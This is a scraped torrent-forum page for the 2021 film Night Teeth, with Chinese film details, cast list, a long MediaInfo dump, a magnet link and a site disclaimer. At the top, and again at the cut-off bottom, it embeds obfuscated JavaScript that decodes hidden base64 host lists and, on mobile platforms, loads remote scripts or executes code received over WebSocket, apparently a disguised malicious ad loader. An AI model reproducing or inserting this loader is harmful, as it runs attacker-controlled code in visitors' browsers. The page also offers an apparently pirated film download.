暗夜獠牙[中文字幕].Night.Teeth.2021.1080p.NF.WEB-DL.DDP5.1.Atmos.x264 11.69GB

版主小s 1月前 353

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 暗夜獠牙 / 夜牙

◎片 名 Night Teeth

◎年 代 2021

◎产 地 美国

◎类 别 惊悚

◎语 言 英语

◎上映日期 2021-10-20(美国)

◎IMDb链接 https://www.imdb.com/title/tt10763820/

◎豆瓣链接 https://movie.douban.com/subject/34909401/

◎导 演 亚当·兰道 Adam Randall (id:1224204)

◎演 员 亚历山大·路德韦格 Alexander Ludwig (id:1044990)

西德妮·斯威尼 Sydney Sweeney (id:1388812)

黛比·瑞恩 Debby Ryan (id:1230836)

阿尔菲·艾伦 Alfie Allen (id:1049903)

露西·弗莱 Lucy Fry (id:1327046)

劳尔·卡斯提洛 Raúl Castillo (id:1338121)

小豪尔赫·兰登伯格 Jorge Lendeborg Jr. (id:1376970)

拜伦·巴特 Bryan Batt (id:1062068)

玛琳娜·福特 Marlene Forte (id:1333494)

切斯·玛瑟尔 Chase Maser (id:1345247)

阿什·桑托斯 Ash Santos (id:1400974)

亨特·巴克 Hunter Burke (id:1344028)

德文·泰勒 Devyn A. Tyler (id:1446307)

贾伦·米切尔 Jaren Mitchell (id:1426895)

马丁·巴特斯·布拉德福德 Martin Bats Bradford (id:1389734)

CG刘易斯 CG Lewis (id:1443049)

彼得·詹梅斯 Peter Jaymes Jr. (id:1382871)

爱德华多·莱斯卡诺 Eduardo Lezcano (id:1397145)

◎标 签 2021 / 惊悚 / 美国 / 网飞 / 亚历山大·路德韦格 / 阿尔菲·艾伦 / 美国电影 / 小豪尔赫·兰登伯格

◎简 介

影片讲述在洛杉矶的一个夜晚,一个年轻的司机(兰登伯格饰)载着两个年轻漂亮的女人,奔赴5个不同的派对。在他发现她们并不是先前她们所声称的那样,他陷入到怀疑人生之中。

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 324035721926880539747522813298137751660 (0xF3C7028EC55B96038E1E8646C305E06C)

  4. Complete name : [email protected]COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 11.7 GiB

  8. Duration : 1 h 48 min

  9. Overall bit rate mode : Variable

  10. Overall bit rate : 15.4 Mb/s

  11. Encoded date : UTC 2021-10-20 08:53:28

  12. Writing application : mkvmerge v62.0.0 ('Apollo') 64-bit

  13. Writing library : libebml v1.4.2 + libmatroska v1.6.4


  14. Video

  15. ID : 1

  16. Format : AVC

  17. Format/Info : Advanced Video Codec

  18. Format profile : [email protected]

  19. Format settings : CABAC / 3 Ref Frames

  20. Format settings, CABAC : Yes

  21. Format settings, Reference frames : 3 frames

  22. Codec ID : V_MPEG4/ISO/AVC

  23. Duration : 1 h 48 min

  24. Bit rate mode : Variable

  25. Bit rate : 5 800 kb/s

  26. Maximum bit rate : 8 700 kb/s

  27. Width : 1 920 pixels

  28. Height : 1 080 pixels

  29. Display aspect ratio : 16:9

  30. Frame rate mode : Constant

  31. Frame rate : 24.000 FPS

  32. Color space : YUV

  33. Chroma subsampling : 4:2:0

  34. Bit depth : 8 bits

  35. Scan type : Progressive

  36. Bits/(Pixel*Frame) : 0.117

  37. Stream size : 4.29 GiB (37%)

  38. Writing library : x264 core 148 r2724 dbe0335

  39. Encoding settings : cabac=1 / ref=3 / deblock=1:0:0 / analyse=0x1:0x111 / me=umh / subme=10 / psy=1 / psy_rd=1.00:0.00 / mixed_ref=1 / me_range=24 / chroma_me=1 / trellis=2 / 8x8dct=0 / cqm=0 / deadzone=21,11 / fast_pskip=1 / chroma_qp_offset=-2 / threads=6 / lookahead_threads=1 / sliced_threads=0 / nr=0 / decimate=1 / interlaced=0 / NTMzNTQ= / bluray_compat=0 / stitchable=1 / constrained_intra=0 / bframes=2 / b_pyramid=0 / b_adapt=2 / b_bias=0 / direct=3 / weightb=1 / open_gop=0 / weightp=2 / keyint=250 / keyint_min=24 / scenecut=0 / intra_refresh=0 / rc_lookahead=48 / rc=2pass / mbtree=1 / bitrate=5800 / ratetol=1.0 / qcomp=0.50 / qpmin=6 / qpmax=51 / qpstep=4 / cplxblur=20.0 / qblur=0.5 / vbv_maxrate=8700 / vbv_bufsize=11600 / nal_hrd=vbr / filler=0 / NTMzNTQ=LmsMAP37EqsCpk / ip_ratio=1.40 / aq=1:1.00

  40. Default : Yes

  41. Forced : No


  42. Audio #1

  43. ID : 2

  44. Format : E-AC-3 JOC

  45. Format/Info : Enhanced AC-3 with Joint Object Coding

  46. Commercial name : Dolby Digital Plus with Dolby Atmos

  47. Codec ID : A_EAC3

  48. Duration : 1 h 48 min

  49. Bit rate mode : Constant

  50. Bit rate : 768 kb/s

  51. Channel(s) : 6 channels

  52. Channel layout : L R C LFE Ls Rs

  53. Sampling rate : 48.0 kHz

  54. Frame rate : 31.250 FPS (1536 SPF)

  55. Compression mode : Lossy

  56. Stream size : 597 MiB (5%)

  57. Title : English

  58. Language : English

  59. Service kind : Complete Main

  60. Default : Yes

  61. Forced : No

  62. Complexity index : 16

  63. Number of dynamic objects : 15

  64. Bed channel count : 1 channel

  65. Bed channel configuration : LFE


  66. Audio #2

  67. ID : 3

  68. Format : E-AC-3

  69. Format/Info : Enhanced AC-3

  70. Commercial name : Dolby Digital Plus

  71. Codec ID : A_EAC3

  72. Duration : 1 h 48 min

  73. Bit rate mode : Constant

  74. Bit rate : 640 kb/s

  75. Channel(s) : 6 channels

  76. Channel layout : L R C LFE Ls Rs

  77. Sampling rate : 48.0 kHz

  78. Frame rate : 31.250 FPS (1536 SPF)

  79. Compression mode : Lossy

  80. Stream size : 498 MiB (4%)

  81. Title : Czech

  82. Language : Czech

  83. Service kind : Complete Main

  84. Default : No

  85. Forced : No


  86. Audio #3

  87. ID : 4

  88. Format : E-AC-3

  89. Format/Info : Enhanced AC-3

  90. Commercial name : Dolby Digital Plus

  91. Codec ID : A_EAC3

  92. Duration : 1 h 48 min

  93. Bit rate mode : Constant

  94. Bit rate : 640 kb/s

  95. Channel(s) : 6 channels

  96. Channel layout : L R C LFE Ls Rs

  97. Sampling rate : 48.0 kHz

  98. Frame rate : 31.250 FPS (1536 SPF)

  99. Compression mode : Lossy

  100. Stream size : 498 MiB (4%)

  101. Title : French

  102. Language : French

  103. Service kind : Complete Main

  104. Default : No

  105. Forced : No


  106. Audio #4

  107. ID : 5

  108. Format : E-AC-3

  109. Format/Info : Enhanced AC-3

  110. Commercial name : Dolby Digital Plus

  111. Codec ID : A_EAC3

  112. Duration : 1 h 48 min

  113. Bit rate mode : Constant

  114. Bit rate : 640 kb/s

  115. Channel(s) : 6 channels

  116. Channel layout : L R C LFE Ls Rs

  117. Sampling rate : 48.0 kHz

  118. Frame rate : 31.250 FPS (1536 SPF)

  119. Compression mode : Lossy

  120. Stream size : 498 MiB (4%)

  121. Title : German

  122. Language : German

  123. Service kind : Complete Main

  124. Default : No

  125. Forced : No


  126. Audio #5

  127. ID : 6

  128. Format : E-AC-3

  129. Format/Info : Enhanced AC-3

  130. Commercial name : Dolby Digital Plus

  131. Codec ID : A_EAC3

  132. Duration : 1 h 48 min

  133. Bit rate mode : Constant

  134. Bit rate : 640 kb/s

  135. Channel(s) : 6 channels

  136. Channel layout : L R C LFE Ls Rs

  137. Sampling rate : 48.0 kHz

  138. Frame rate : 31.250 FPS (1536 SPF)

  139. Compression mode : Lossy

  140. Stream size : 498 MiB (4%)

  141. Title : Hindi

  142. Language : Hindi

  143. Service kind : Complete Main

  144. Default : No

  145. Forced : No


  146. Audio #6

  147. ID : 7

  148. Format : E-AC-3

  149. Format/Info : Enhanced AC-3

  150. Commercial name : Dolby Digital Plus

  151. Codec ID : A_EAC3

  152. Duration : 1 h 48 min

  153. Bit rate mode : Constant

  154. Bit rate : 640 kb/s

  155. Channel(s) : 6 channels

  156. Channel layout : L R C LFE Ls Rs

  157. Sampling rate : 48.0 kHz

  158. Frame rate : 31.250 FPS (1536 SPF)

  159. Compression mode : Lossy

  160. Stream size : 498 MiB (4%)

  161. Title : Hungarian

  162. Language : Hungarian

  163. Service kind : Complete Main

  164. Default : No

  165. Forced : No


  166. Audio #7

  167. ID : 8

  168. Format : E-AC-3

  169. Format/Info : Enhanced AC-3

  170. Commercial name : Dolby Digital Plus

  171. Codec ID : A_EAC3

  172. Duration : 1 h 48 min

  173. Bit rate mode : Constant

  174. Bit rate : 640 kb/s

  175. Channel(s) : 6 channels

  176. Channel layout : L R C LFE Ls Rs

  177. Sampling rate : 48.0 kHz

  178. Frame rate : 31.250 FPS (1536 SPF)

  179. Compression mode : Lossy

  180. Stream size : 498 MiB (4%)

  181. Title : Italian

  182. Language : Italian

  183. Service kind : Complete Main

  184. Default : No

  185. Forced : No


  186. Audio #8

  187. ID : 9

  188. Format : E-AC-3

  189. Format/Info : Enhanced AC-3

  190. Commercial name : Dolby Digital Plus

  191. Codec ID : A_EAC3

  192. Duration : 1 h 48 min

  193. Bit rate mode : Constant

  194. Bit rate : 640 kb/s

  195. Channel(s) : 6 channels

  196. Channel layout : L R C LFE Ls Rs

  197. Sampling rate : 48.0 kHz

  198. Frame rate : 31.250 FPS (1536 SPF)

  199. Compression mode : Lossy

  200. Stream size : 498 MiB (4%)

  201. Title : Japanese

  202. Language : Japanese

  203. Service kind : Complete Main

  204. Default : No

  205. Forced : No


  206. Audio #9

  207. ID : 10

  208. Format : E-AC-3

  209. Format/Info : Enhanced AC-3

  210. Commercial name : Dolby Digital Plus

  211. Codec ID : A_EAC3

  212. Duration : 1 h 48 min

  213. Bit rate mode : Constant

  214. Bit rate : 640 kb/s

  215. Channel(s) : 6 channels

  216. Channel layout : L R C LFE Ls Rs

  217. Sampling rate : 48.0 kHz

  218. Frame rate : 31.250 FPS (1536 SPF)

  219. Compression mode : Lossy

  220. Stream size : 498 MiB (4%)

  221. Title : Polish

  222. Language : Polish

  223. Service kind : Complete Main

  224. Default : No

  225. Forced : No


  226. Audio #10

  227. ID : 11

  228. Format : E-AC-3

  229. Format/Info : Enhanced AC-3

  230. Commercial name : Dolby Digital Plus

  231. Codec ID : A_EAC3

  232. Duration : 1 h 48 min

  233. Bit rate mode : Constant

  234. Bit rate : 640 kb/s

  235. Channel(s) : 6 channels

  236. Channel layout : L R C LFE Ls Rs

  237. Sampling rate : 48.0 kHz

  238. Frame rate : 31.250 FPS (1536 SPF)

  239. Compression mode : Lossy

  240. Stream size : 498 MiB (4%)

  241. Title : Brazilian Portuguese

  242. Language : Portuguese

  243. Service kind : Complete Main

  244. Default : No

  245. Forced : No


  246. Audio #11

  247. ID : 12

  248. Format : E-AC-3

  249. Format/Info : Enhanced AC-3

  250. Commercial name : Dolby Digital Plus

  251. Codec ID : A_EAC3

  252. Duration : 1 h 48 min

  253. Bit rate mode : Constant

  254. Bit rate : 640 kb/s

  255. Channel(s) : 6 channels

  256. Channel layout : L R C LFE Ls Rs

  257. Sampling rate : 48.0 kHz

  258. Frame rate : 31.250 FPS (1536 SPF)

  259. Compression mode : Lossy

  260. Stream size : 498 MiB (4%)

  261. Title : Russian

  262. Language : Russian

  263. Service kind : Complete Main

  264. Default : No

  265. Forced : No


  266. Audio #12

  267. ID : 13

  268. Format : E-AC-3

  269. Format/Info : Enhanced AC-3

  270. Commercial name : Dolby Digital Plus

  271. Codec ID : A_EAC3

  272. Duration : 1 h 48 min

  273. Bit rate mode : Constant

  274. Bit rate : 640 kb/s

  275. Channel(s) : 6 channels

  276. Channel layout : L R C LFE Ls Rs

  277. Sampling rate : 48.0 kHz

  278. Frame rate : 31.250 FPS (1536 SPF)

  279. Compression mode : Lossy

  280. Stream size : 498 MiB (4%)

  281. Title : Spanish

  282. Language : Spanish

  283. Service kind : Complete Main

  284. Default : No

  285. Forced : No


  286. Audio #13

  287. ID : 14

  288. Format : E-AC-3

  289. Format/Info : Enhanced AC-3

  290. Commercial name : Dolby Digital Plus

  291. Codec ID : A_EAC3

  292. Duration : 1 h 48 min

  293. Bit rate mode : Constant

  294. Bit rate : 640 kb/s

  295. Channel(s) : 6 channels

  296. Channel layout : L R C LFE Ls Rs

  297. Sampling rate : 48.0 kHz

  298. Frame rate : 31.250 FPS (1536 SPF)

  299. Compression mode : Lossy

  300. Stream size : 498 MiB (4%)

  301. Title : European Spanish

  302. Language : Spanish

  303. Service kind : Complete Main

  304. Default : No

  305. Forced : No


  306. Audio #14

  307. ID : 15

  308. Format : E-AC-3

  309. Format/Info : Enhanced AC-3

  310. Commercial name : Dolby Digital Plus

  311. Codec ID : A_EAC3

  312. Duration : 1 h 48 min

  313. Bit rate mode : Constant

  314. Bit rate : 640 kb/s

  315. Channel(s) : 6 channels

  316. Channel layout : L R C LFE Ls Rs

  317. Sampling rate : 48.0 kHz

  318. Frame rate : 31.250 FPS (1536 SPF)

  319. Compression mode : Lossy

  320. Stream size : 498 MiB (4%)

  321. Title : Thai

  322. Language : Thai

  323. Service kind : Complete Main

  324. Default : No

  325. Forced : No


  326. Audio #15

  327. ID : 16

  328. Format : E-AC-3

  329. Format/Info : Enhanced AC-3

  330. Commercial name : Dolby Digital Plus

  331. Codec ID : A_EAC3

  332. Duration : 1 h 48 min

  333. Bit rate mode : Constant

  334. Bit rate : 640 kb/s

  335. Channel(s) : 6 channels

  336. Channel layout : L R C LFE Ls Rs

  337. Sampling rate : 48.0 kHz

  338. Frame rate : 31.250 FPS (1536 SPF)

  339. Compression mode : Lossy

  340. Stream size : 498 MiB (4%)

  341. Title : Turkish

  342. Language : Turkish

  343. Service kind : Complete Main

  344. Default : No

  345. Forced : No


  346. Text #1

  347. ID : 17

  348. Format : UTF-8

  349. Codec ID : S_TEXT/UTF8

  350. Codec ID/Info : UTF-8 Plain Text

  351. Duration : 1 h 45 min

  352. Bit rate : 95 b/s

  353. Count of elements : 1757

  354. Stream size : 73.8 KiB (0%)

  355. Title : English

  356. Language : English

  357. Default : Yes

  358. Forced : No


  359. Text #2

  360. ID : 18

  361. Format : UTF-8

  362. Codec ID : S_TEXT/UTF8

  363. Codec ID/Info : UTF-8 Plain Text

  364. Duration : 1 h 0 min

  365. Bit rate : 2 b/s

  366. Count of elements : 32

  367. Stream size : 970 Bytes (0%)

  368. Title : English (Forced)

  369. Language : English

  370. Default : No

  371. Forced : Yes


  372. Text #3

  373. ID : 19

  374. Format : UTF-8

  375. Codec ID : S_TEXT/UTF8

  376. Codec ID/Info : UTF-8 Plain Text

  377. Duration : 1 h 46 min

  378. Bit rate : 82 b/s

  379. Count of elements : 1231

  380. Stream size : 64.3 KiB (0%)

  381. Title : Arabic

  382. Language : Arabic

  383. Default : No

  384. Forced : No


  385. Text #4

  386. ID : 20

  387. Format : UTF-8

  388. Codec ID : S_TEXT/UTF8

  389. Codec ID/Info : UTF-8 Plain Text

  390. Duration : 1 h 46 min

  391. Bit rate : 50 b/s

  392. Count of elements : 1230

  393. Stream size : 39.7 KiB (0%)

  394. Title : Chinese Simplified

  395. Language : Chinese

  396. Default : No

  397. Forced : No


  398. Text #5

  399. ID : 21

  400. Format : UTF-8

  401. Codec ID : S_TEXT/UTF8

  402. Codec ID/Info : UTF-8 Plain Text

  403. Duration : 1 h 46 min

  404. Bit rate : 49 b/s

  405. Count of elements : 1239

  406. Stream size : 38.9 KiB (0%)

  407. Title : Chinese Traditional

  408. Language : Chinese

  409. Default : No

  410. Forced : No


  411. Text #6

  412. ID : 22

  413. Format : UTF-8

  414. Codec ID : S_TEXT/UTF8

  415. Codec ID/Info : UTF-8 Plain Text

  416. Duration : 1 h 46 min

  417. Bit rate : 39 b/s

  418. Count of elements : 1216

  419. Stream size : 30.9 KiB (0%)

  420. Title : Croatian

  421. Language : Croatian

  422. Default : No

  423. Forced : No


  424. Text #7

  425. ID : 23

  426. Format : UTF-8

  427. Codec ID : S_TEXT/UTF8

  428. Codec ID/Info : UTF-8 Plain Text

  429. Duration : 1 h 46 min

  430. Bit rate : 44 b/s

  431. Count of elements : 1233

  432. Stream size : 34.7 KiB (0%)

  433. Title : Czech

  434. Language : Czech

  435. Default : No

  436. Forced : No


  437. Text #8

  438. ID : 24

  439. Format : UTF-8

  440. Codec ID : S_TEXT/UTF8

  441. Codec ID/Info : UTF-8 Plain Text

  442. Duration : 1 h 46 min

  443. Bit rate : 43 b/s

  444. Count of elements : 1208

  445. Stream size : 33.8 KiB (0%)

  446. Title : Danish

  447. Language : Danish

  448. Default : No

  449. Forced : No


  450. Text #9

  451. ID : 25

  452. Format : UTF-8

  453. Codec ID : S_TEXT/UTF8

  454. Codec ID/Info : UTF-8 Plain Text

  455. Duration : 1 h 46 min

  456. Bit rate : 42 b/s

  457. Count of elements : 1138

  458. Stream size : 33.6 KiB (0%)

  459. Title : Dutch

  460. Language : Dutch

  461. Default : No

  462. Forced : No


  463. Text #10

  464. ID : 26

  465. Format : UTF-8

  466. Codec ID : S_TEXT/UTF8

  467. Codec ID/Info : UTF-8 Plain Text

  468. Duration : 1 h 46 min

  469. Bit rate : 45 b/s

  470. Count of elements : 978

  471. Stream size : 35.9 KiB (0%)

  472. Title : Finnish

  473. Language : Finnish

  474. Default : No

  475. Forced : No


  476. Text #11

  477. ID : 27

  478. Format : UTF-8

  479. Codec ID : S_TEXT/UTF8

  480. Codec ID/Info : UTF-8 Plain Text

  481. Duration : 1 h 46 min

  482. Bit rate : 42 b/s

  483. Count of elements : 1231

  484. Stream size : 33.6 KiB (0%)

  485. Title : French

  486. Language : French

  487. Default : No

  488. Forced : No


  489. Text #12

  490. ID : 28

  491. Format : UTF-8

  492. Codec ID : S_TEXT/UTF8

  493. Codec ID/Info : UTF-8 Plain Text

  494. Duration : 1 h 46 min

  495. Bit rate : 45 b/s

  496. Count of elements : 1200

  497. Stream size : 35.6 KiB (0%)

  498. Title : German

  499. Language : German

  500. Default : No

  501. Forced : No


  502. Text #13

  503. ID : 29

  504. Format : UTF-8

  505. Codec ID : S_TEXT/UTF8

  506. Codec ID/Info : UTF-8 Plain Text

  507. Duration : 1 h 46 min

  508. Bit rate : 76 b/s

  509. Count of elements : 1249

  510. Stream size : 59.7 KiB (0%)

  511. Title : Greek

  512. Language : Greek

  513. Default : No

  514. Forced : No


  515. Text #14

  516. ID : 30

  517. Format : UTF-8

  518. Codec ID : S_TEXT/UTF8

  519. Codec ID/Info : UTF-8 Plain Text

  520. Duration : 1 h 39 min

  521. Bit rate : 80 b/s

  522. Count of elements : 1247

  523. Stream size : 58.5 KiB (0%)

  524. Title : Hebrew

  525. Language : Hebrew

  526. Default : No

  527. Forced : No


  528. Text #15

  529. ID : 31

  530. Format : UTF-8

  531. Codec ID : S_TEXT/UTF8

  532. Codec ID/Info : UTF-8 Plain Text

  533. Duration : 1 h 46 min

  534. Bit rate : 47 b/s

  535. Count of elements : 1196

  536. Stream size : 37.2 KiB (0%)

  537. Title : Hungarian

  538. Language : Hungarian

  539. Default : No

  540. Forced : No


  541. Text #16

  542. ID : 32

  543. Format : UTF-8

  544. Codec ID : S_TEXT/UTF8

  545. Codec ID/Info : UTF-8 Plain Text

  546. Duration : 1 h 46 min

  547. Bit rate : 43 b/s

  548. Count of elements : 1230

  549. Stream size : 34.0 KiB (0%)

  550. Title : Indonesian

  551. Language : Indonesian

  552. Default : No

  553. Forced : No


  554. Text #17

  555. ID : 33

  556. Format : UTF-8

  557. Codec ID : S_TEXT/UTF8

  558. Codec ID/Info : UTF-8 Plain Text

  559. Duration : 1 h 46 min

  560. Bit rate : 41 b/s

  561. Count of elements : 1203

  562. Stream size : 32.4 KiB (0%)

  563. Title : Italian

  564. Language : Italian

  565. Default : No

  566. Forced : No


  567. Text #18

  568. ID : 34

  569. Format : UTF-8

  570. Codec ID : S_TEXT/UTF8

  571. Codec ID/Info : UTF-8 Plain Text

  572. Duration : 1 h 46 min

  573. Bit rate : 47 b/s

  574. Count of elements : 1262

  575. Stream size : 37.1 KiB (0%)

  576. Title : Japanese

  577. Language : Japanese

  578. Default : No

  579. Forced : No


  580. Text #19

  581. ID : 35

  582. Format : UTF-8

  583. Codec ID : S_TEXT/UTF8

  584. Codec ID/Info : UTF-8 Plain Text

  585. Duration : 1 h 46 min

  586. Bit rate : 54 b/s

  587. Count of elements : 1249

  588. Stream size : 42.4 KiB (0%)

  589. Title : Korean

  590. Language : Korean

  591. Default : No

  592. Forced : No


  593. Text #20

  594. ID : 36

  595. Format : UTF-8

  596. Codec ID : S_TEXT/UTF8

  597. Codec ID/Info : UTF-8 Plain Text

  598. Duration : 1 h 46 min

  599. Bit rate : 46 b/s

  600. Count of elements : 1167

  601. Stream size : 36.6 KiB (0%)

  602. Title : Malay

  603. Language : Malay

  604. Default : No

  605. Forced : No


  606. Text #21

  607. ID : 37

  608. Format : UTF-8

  609. Codec ID : S_TEXT/UTF8

  610. Codec ID/Info : UTF-8 Plain Text

  611. Duration : 1 h 46 min

  612. Bit rate : 42 b/s

  613. Count of elements : 1192

  614. Stream size : 33.7 KiB (0%)

  615. Title : Norwegian Bokmal

  616. Language : Norwegian Bokmal

  617. Default : No

  618. Forced : No


  619. Text #22

  620. ID : 38

  621. Format : UTF-8

  622. Codec ID : S_TEXT/UTF8

  623. Codec ID/Info : UTF-8 Plain Text

  624. Duration : 1 h 46 min

  625. Bit rate : 42 b/s

  626. Count of elements : 1221

  627. Stream size : 33.5 KiB (0%)

  628. Title : Polish

  629. Language : Polish

  630. Default : No

  631. Forced : No


  632. Text #23

  633. ID : 39

  634. Format : UTF-8

  635. Codec ID : S_TEXT/UTF8

  636. Codec ID/Info : UTF-8 Plain Text

  637. Duration : 1 h 46 min

  638. Bit rate : 43 b/s

  639. Count of elements : 1207

  640. Stream size : 33.7 KiB (0%)

  641. Title : Portuguese

  642. Language : Portuguese

  643. Default : No

  644. Forced : No


  645. Text #24

  646. ID : 40

  647. Format : UTF-8

  648. Codec ID : S_TEXT/UTF8

  649. Codec ID/Info : UTF-8 Plain Text

  650. Duration : 1 h 39 min

  651. Bit rate : 46 b/s

  652. Count of elements : 1308

  653. Stream size : 33.9 KiB (0%)

  654. Title : Brazilian Portuguese

  655. Language : Portuguese

  656. Default : No

  657. Forced : No


  658. Text #25

  659. ID : 41

  660. Format : UTF-8

  661. Codec ID : S_TEXT/UTF8

  662. Codec ID/Info : UTF-8 Plain Text

  663. Duration : 1 h 46 min

  664. Bit rate : 50 b/s

  665. Count of elements : 1221

  666. Stream size : 39.5 KiB (0%)

  667. Title : Romanian

  668. Language : Romanian

  669. Default : No

  670. Forced : No


  671. Text #26

  672. ID : 42

  673. Format : UTF-8

  674. Codec ID : S_TEXT/UTF8

  675. Codec ID/Info : UTF-8 Plain Text

  676. Duration : 1 h 46 min

  677. Bit rate : 75 b/s

  678. Count of elements : 1298

  679. Stream size : 59.2 KiB (0%)

  680. Title : Russian

  681. Language : Russian

  682. Default : No

  683. Forced : No


  684. Text #27

  685. ID : 43

  686. Format : UTF-8

  687. Codec ID : S_TEXT/UTF8

  688. Codec ID/Info : UTF-8 Plain Text

  689. Duration : 1 h 46 min

  690. Bit rate : 45 b/s

  691. Count of elements : 1214

  692. Stream size : 35.3 KiB (0%)

  693. Title : Spanish

  694. Language : Spanish

  695. Default : No

  696. Forced : No


  697. Text #28

  698. ID : 44

  699. Format : UTF-8

  700. Codec ID : S_TEXT/UTF8

  701. Codec ID/Info : UTF-8 Plain Text

  702. Duration : 1 h 46 min

  703. Bit rate : 45 b/s

  704. Count of elements : 1249

  705. Stream size : 35.8 KiB (0%)

  706. Title : European Spanish

  707. Language : Spanish

  708. Default : No

  709. Forced : No


  710. Text #29

  711. ID : 45

  712. Format : UTF-8

  713. Codec ID : S_TEXT/UTF8

  714. Codec ID/Info : UTF-8 Plain Text

  715. Duration : 1 h 46 min

  716. Bit rate : 44 b/s

  717. Count of elements : 1145

  718. Stream size : 34.7 KiB (0%)

  719. Title : Swedish

  720. Language : Swedish

  721. Default : No

  722. Forced : No


  723. Text #30

  724. ID : 46

  725. Format : UTF-8

  726. Codec ID : S_TEXT/UTF8

  727. Codec ID/Info : UTF-8 Plain Text

  728. Duration : 1 h 46 min

  729. Bit rate : 113 b/s

  730. Count of elements : 1238

  731. Stream size : 89.2 KiB (0%)

  732. Title : Thai

  733. Language : Thai

  734. Default : No

  735. Forced : No


  736. Text #31

  737. ID : 47

  738. Format : UTF-8

  739. Codec ID : S_TEXT/UTF8

  740. Codec ID/Info : UTF-8 Plain Text

  741. Duration : 1 h 46 min

  742. Bit rate : 48 b/s

  743. Count of elements : 1229

  744. Stream size : 38.0 KiB (0%)

  745. Title : Turkish

  746. Language : Turkish

  747. Default : No

  748. Forced : No


  749. Text #32

  750. ID : 48

  751. Format : UTF-8

  752. Codec ID : S_TEXT/UTF8

  753. Codec ID/Info : UTF-8 Plain Text

  754. Duration : 1 h 46 min

  755. Bit rate : 72 b/s

  756. Count of elements : 1245

  757. Stream size : 57.0 KiB (0%)

  758. Title : Ukrainian

  759. Language : Ukrainian

  760. Default : No

  761. Forced : No


  762. Text #33

  763. ID : 49

  764. Format : UTF-8

  765. Codec ID : S_TEXT/UTF8

  766. Codec ID/Info : UTF-8 Plain Text

  767. Duration : 1 h 46 min

  768. Bit rate : 65 b/s

  769. Count of elements : 1228

  770. Stream size : 51.3 KiB (0%)

  771. Title : Vietnamese

  772. Language : Vietnamese

  773. Default : No

  774. Forced : No




复制代码


TAGS 惊悚

磁力链:
  • magnet:?xt=urn:btih:3C1F6B87CE1AD1A7BEC8FA0E85DB3DBCDDBFC80B

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in 